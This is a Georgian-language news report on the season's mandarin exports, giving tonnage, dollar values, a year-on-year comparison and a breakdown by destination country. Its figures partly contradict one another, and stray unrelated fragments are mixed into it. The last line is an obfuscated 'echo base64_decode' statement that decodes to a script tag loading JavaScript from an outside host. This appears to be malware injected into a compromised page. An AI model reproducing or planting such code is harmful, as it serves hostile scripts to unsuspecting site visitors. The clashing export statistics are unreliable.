celsiusi
ავერსი შნაიდერი

სოფლის მეურნეობის სამინისტროს მიერ გავრცელებული ინფორმაციით, მიმდინარე წლის 1 სექტემბრიდან დღემდე საქართველოდან 29.3 ათასი ტონა მანდარინის ექსპორტი განხორციელდა, რომლის ღირებულებამ 19.4 მლნ დოლარი შეადგინა.

გასული წლის ანალოგიურ პერიოდთან შედარებით, ექსპორტირებული მანდარინის მოცულობა 17.1 ათასი ტონით (141%), ხოლო ღირებულება - 12.7 მლნ აშშ დოლარით (191%) გაიზარდა.

დეკემბრის თვის ოფიციალური მონაცემები სტატისტიკის ეროვნული სამსახურის ვებგვერდზე ჯერ ასახული არ არის, იანვარ-ნოემბრის მონაცემებით კი, 7.8 მლნ აშშ დოლარის 13 606 ტონა მანდარინი გაიტანა ექსპორტზე, 2022 წლის ანალოგიურ პერიოდში კი, ექსპორტი 6.1 მლნ აშშ დოლარის 11 360 ტონა იყო. ტრადიციულად ქართული ციტრუსის გასაღების მთავარი ბაზარი რუსეთია.

ოფიციალური მონაცემებით, სრული ექსპორტის 62.3% რუსეთზე მოდის. საექსპორტო ქვეყნების ჩამონათვალი კი, ასეთია:

  • რუსეთი - 5.5 მლნ აშშ დოლარის 8 487 ტონა;
  • სომხეთი - 2.2 მლნ აშშ დოლარის 5 012 ტონა;
  • ყაზახეთი - 36.6 ათასი აშშ დოლარის 61.2 ტონა;
  • გერმანია - 19.6 ათასი აშშ დოლარის 19.6 ტონა;
  • უკრაინა - 13.1 ათასი აშშ დოლარის 20.1 ტონა;
  • თურქეთი - 9.2 ათასი აშშ დოლარის 19.2 ტონა;
193
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");